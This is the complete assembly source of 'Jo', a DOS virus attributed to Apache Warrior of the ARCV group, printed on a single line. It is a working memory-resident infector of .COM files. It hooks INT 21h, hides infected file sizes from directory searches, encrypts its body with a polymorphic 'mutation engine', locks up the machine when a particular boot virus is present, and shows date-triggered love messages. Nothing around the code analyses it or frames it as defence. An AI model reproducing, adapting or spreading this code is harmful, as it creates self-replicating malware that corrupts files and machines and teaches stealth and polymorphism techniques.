NAME Jo PAGE 55,132 TITLE Jo Virus. ; ; This is Yet another virus from the ARCV, this one is called ; Joanna, it was written by Apache Warrior, ARCV President. ; ; It has Stealth features, it is a Resident infector of .COM files ; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for ; its Polymorphic features. There is a maximum of 3 unchanged bytes ; in the Encrypted code. ; .model tiny code segment ASSUME CS:CODE,DS:CODE,ES:CODE int_21ofs equ 84h int_21seg equ 86h length equ offset handle-offset main msglen equ offset oldstart-offset msg tsrlen equ (offset findat-offset main)/10 len equ offset handle-offset main virlen equ (offset string-offset main2)/2 decryptlen equ offset main2-offset main org 100h start: jmp main db 0,0,0 main: mov si,offset main2 ; SI offset for decrypt mov cx,virlen ; viri decrypt size loop_1: db 2eh,81h,2ch ; decrypt switch: dw 0 add si,02h dec cx jnz loop_1 main2: call findoff ; find file ofset findoff: pop si ; sub si,offset findoff push ds push es push cs pop ds push cs pop es mov ax,0ff05h ; Test for Scythe2 Boot int 13h cmp ah,0e9h ; Check for Scythe2 Boot jnz haha ; no go on mov ah,09h ; Display message lea dx,[si+offset msg2] int 21h jmp $ ; Crash the machine haha: mov ah,2ah ; Date Test int 21h ; cmp dx,1210h ; Is month the Oct. jnz main3 ; no go on mov ah,09h ; Display Message lea dx,[si+offset msg] int 21h main3: mov di,0100h ; move old programs push si ; start back to the start mov ax,offset oldstart ; add si,ax ; mov cx,05h ; cld ; repz movsb ; inst: mov ax,0ffa4h ; check to see if already instaled int 21h pop si ; bring back si cmp ax,42a1h je oldprog ; Yes return to old program tt2: xor ax,ax ; Residency Routine push ax mov ax,ds ; Get MCB segment Address dec ax ; mov es,ax ; Put MCB segment Address in es pop ds ; mov ax,word ptr ds:int_21ofs ; Load Int 21h address data mov cx,word ptr ds:int_21seg ; mov word ptr cs:[si+int21],ax ; Move Int 21h data to store mov word ptr cs:[si+int21+2],cx ; cmp byte ptr es:[0],5ah ; Check for Start of MCB jne oldprog ; If no then quit mov ax,es:[3] ; Play with MCB to get top of sub ax,0bch ; Memory and reserve 3,008 bytes jb oldprog ; for Virus mov es:[3],ax ; sub word ptr es:[12h],0bch ; mov es,es:[12h] ; push ds ; push cs ; pop ds ; Move Virus into Memory mov di,0100h ; space allocated above mov cx,len+5 ; push si ; add si,0100h ; rep movsb ; pop si pop ds cli ; Stop Interrupts Very Inportant mov ax,offset new21 ; Load New Int 21h handler mov word ptr ds:int_21ofs,ax ; address and store mov word ptr ds:int_21seg,es ; sti ; oldprog: mov di,0100h ; Return to Orginal pop es ; Program.. pop ds ; push di ; ret ; int21 dd 0h ; Storage For Int 21h Address ; ; New interupt 21h Handler ; sayitis: mov ax,42a1h ; Install Check.. iret new21: ;nop ; Sign byte cmp ax,0ffa4h ; Instalation Check je sayitis cmp ah,11h ; FCB Search file je adjust_FCB cmp ah,12h ; FCB Search Again je adjust_FCB cmp ah,4eh ; Handle Search file je adjust_FCB cmp ah,4fh ; Handle Search Again je adjust_FCB cmp ah,3dh ; Are they opening a file? je intgo ; if no ignore cmp ah,4bh ; Exec Function jne noint intgo: push ax ; 4bh, 3dh Infect file push bx ; Handler save the Registers push cx push es push si push di push dx push ds call checkit ; Call infect routine pop ds pop dx pop di pop si pop es pop cx pop bx pop ax noint: jmp cs:[int21] ; Return to Orginal Int 21h adjust_FCB: push es ; Stealth Routine push bx push si push ax xor si,si and ah,40h ; Check for handle Search jz okFCB mov si,1 ; Set flag okFCB: mov ah,2fh ; Get DTA Address int 21h pop ax ; Restore ax to orginal function call i21 ; value call it pushf ; save flags push ax ; save ax error code call adjust ; Call stealth adjust routine pop ax ; restore registers popf pop si pop bx pop es retf 2 ; Return to caller adjust: pushf ; Stealth check routine cmp si,0 ; Check flag set earlyer je fcb1 popf jc repurn ; Check for Handle Search error mov ah,byte ptr es:[bx+16h] ; No error then carry on and ah,01ah ; Check stealth stamp cmp ah,01ah ; jne repurn ; sub word ptr es:[bx+1ah],len ; Infected then take the viri size repurn: ret ; from file size. fcb1: popf ; Same again but for the FCB cmp al,0ffh je meat_hook cmp byte ptr es:[bx],0ffh jne xx2 add bx,7 xx2: mov ah,byte ptr es:[bx+17h] and ah,01ah cmp ah,01ah jne meat_hook sub word ptr es:[bx+1dh],len meat_hook: ret com_txt db 'COM',0 ; reset: ; File Attrib routines mov cx,20h set_back: mov al,01h find_att: mov ah,43h ; Alter file attributes i21: pushf call cs:[int21] exitsub: ret checkit: ; Infect routine push es ; Save some more registers push ds push ds ; Check to see if file is a pop es ; .COM file if not then push dx ; quit.. pop di ; mov cx,0ffh ; Find '.' in File Name mov al,'.' ; repnz scasb ; push cs ; pop ds ; mov si,offset com_txt ; Compare with COM extension mov cx,3 ; rep cmpsb ; pop ds ; Restore Reg... pop es ; jnz exitsub ; foundtype: sub di,06h ; Check for commaND.com cmp ds:[di],'DN' ; Quit if found.. je exitsub ; mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later mov word ptr cs:[nameptr+2],ds ; mov al,00h ; Find Attributes of file to infect call find_att ; jc exitsub ; Error Quit. alteratr: mov cs:[attrib],cx ; Save them call reset ; Reset them to normal mov ax,3d02h ; Open file call i21 jc exitsub ; Error Quit push cs ; Set DS to CS pop ds ; mov ds:[handle],ax ; Store handle mov ax,5700h ; Read file time and date mov bx,ds:[handle] ; call i21 ; ke9: mov ds:[date],dx ; Save DX or cx,1ah ; Set Stealth Stamp mov ds:[time],cx ; Save CX mov ah,3fh ; Read in first 5 bytes mov cx,05h ; To save them mov dx,offset oldstart ; call i21 ; closeit: jc close2 ; Error Quit mov ax,4202h ; Move filepointer to end mov cx,0ffffh ; -5 bytes offset from end mov dx,0fffbh ; call i21 ; jc close ; Error Quit mov word ptr cs:si_val,ax ; Save File saize for later cmp ax,0ea60h ; See if too big jae close ; Yes then Quit mov ah,3fh ; Read in last 5 bytes mov cx,05h ; mov dx,offset tempmem ; call i21 ; jc close ; Error push cs ; Reset ES to CS pop es ; mov di,offset tempmem ; Check if Already infected mov si,offset string ; mov cx,5 ; rep cmpsb ; jz close ; Yes the Close and Quit zapfile: ; No Infect and Be Damned mov ax,word ptr cs:si_val ; add ax,2 ; push cs ; pop ds ; mov word ptr ds:[jpover+1],ax ; Setup new jump call mut_eng ; Call Mutation Engine mov ah,40h ; Save prog to end of file mov bx,cs:[handle] ; Load Handle mov cx,length ; LENGTH OF PROGRAM**** call i21 ; Write away close2: jc close ; Quit if error push cs ; Reset DS to CS pop ds ; mov ax,4200h ; Move File pointer to start xor cx,cx ; of file cwd ; Clever way to XOR DX,DX call i21 ; jc close ; Error Quit.. mov ah,40h ; Save new start mov cx,03h ; mov dx,offset jpover ; call i21 ; close: mov ax,5701h ; Restore Time and Date mov bx,ds:[handle] ; mov cx,ds:[time] ; mov dx,ds:[date] ; call i21 ; mov ah,3eh ; Close file call i21 ; exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where mov cx,ds:[attrib] ; mov ds,word ptr cs:[nameptr+2] ; call set_back ; ret ; Return to INT 21h Handler ; ; CyberTech Mutation Engine ; ; This is Version Two of the Mutation Engine ; Unlike others it is very much Virus Specific.. Works ; Best on Resident Viruses.. ; ; To Call ; ; si_val = File Size ; ; Returns ; DS:DX = Encrypted Virus Code, Use DS:DX pointer to ; Write From.. mut_eng: mov ah,2ch ; Get Time call i21 ; mov word ptr ds:[switch],dx ; Use Sec./100th counter as key mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt mov ax,cs:[si_val] ; Get file size mov dx,offset main2 ; add ax,dx ; mov word ptr [main+1],ax ; Store to Decrypt offset xor byte ptr [loop_1+2],28h ; Toggle Add/Sub xor byte ptr switch2,28h ; " push cs ; Reset Segment Regs. pop ds ; push cs ; pop ax ; Find Spare Segment sub ax,0bch ; and put in es mov es,ax ; mov si,offset main ; Move Decrypt function mov di,0100h ; mov cx,decryptlen ; rep movsb ; mov si,offset main2 ; Start the code encrypt mov cx,virlen ; loop_10: lodsw ; switch2: add ax,0000 ; stosw ; loop loop_10 ; mov si,offset string ; move ID string to end mov cx,5 ; new code rep movsb ; mov dx,0100h ; Set Registers to encrypted Virus push es ; Location pop ds ; ret ; Return ; Data Section, contains Messages etc. ; Little message to the Wife to Be.. msg db 'Looking Good Slimline Joanna.',0dh,0ah db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah db '$' msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$' virus_name db '[JO]',00h, ; Virus Name.. author db 'By Apache Warrior, ARCV Pres.' ; Thats me.. filler dd 0h oldstart: mov ax,4c00h ; Orginal program start int 21h nop nop j100h dd 0100h ; Stores for jumps etc jpover db 0e9h,00,00h ; string db '65fd3' ; ID String heap: ; This code is not saved handle dw 0h nameptr dd 0h attrib dw 0h date dw 0h time dw 0h tempmem db 10h dup (?) findat db 0h si_val dw 0h code ends end start